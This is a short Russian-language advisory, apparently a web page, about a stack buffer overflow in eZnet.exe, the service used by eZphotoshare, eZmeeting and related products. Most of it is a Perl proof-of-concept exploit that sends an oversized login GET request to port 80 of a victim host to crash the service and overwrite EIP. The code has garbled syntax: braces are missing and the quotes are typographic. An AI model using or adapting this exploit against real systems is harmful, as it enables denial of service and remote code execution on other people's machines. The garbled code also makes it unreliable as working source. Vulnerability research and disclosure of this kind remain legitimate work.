Программа: eZ ‘eZnet.exe’ 

Уязвимость обнаружена в нескольких ‘eZ’ программах, включая eZphotoshare, eZmeeting, eZnetwork, и eZshare. Удаленный пользователь может выполнить произвольный код на целевой системе.
Удаленный пользователь может послать специально сформированный пакет к 80 TCP порту, чтобы врывать переполнение буфера в
eZnet.exe. Удаленный пользователь может аварийно завершить работу службы или выполнить произвольный код на целевой системе. 

Эксплоит: 

#!/usr/bin/perl -w

# Stack Overflow Vulnerability in eZphotoshare — PoC
# — by Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket;

if(!($ARGV[0]))

print «Usage: eZstack.pl <victim>\n\n»;
exit;

print «Stack Overflow PoC\n»;

$victim = IO::Socket::INET->new(Proto=>’tcp’,
PeerAddr=>$ARGV[0],
PeerPort=>»80″)
or die «Unable to connect to $ARGV[0] on port
80″;

$eip = «\x58\x58\x58\x58»;

$packet = «» .
«GET /SwEzModule.dll?operation=login&autologin=» .
«a»x4653 . $eip .
«\x20HTTP/1.0.User-Agent: SoftwaxAsys/2.1.10\n\n»;

print $victim $packet;

print » + Making Request …\n»;

sleep(4);
close($victim);

print «Done.\n»;
exit;

Оставить мнение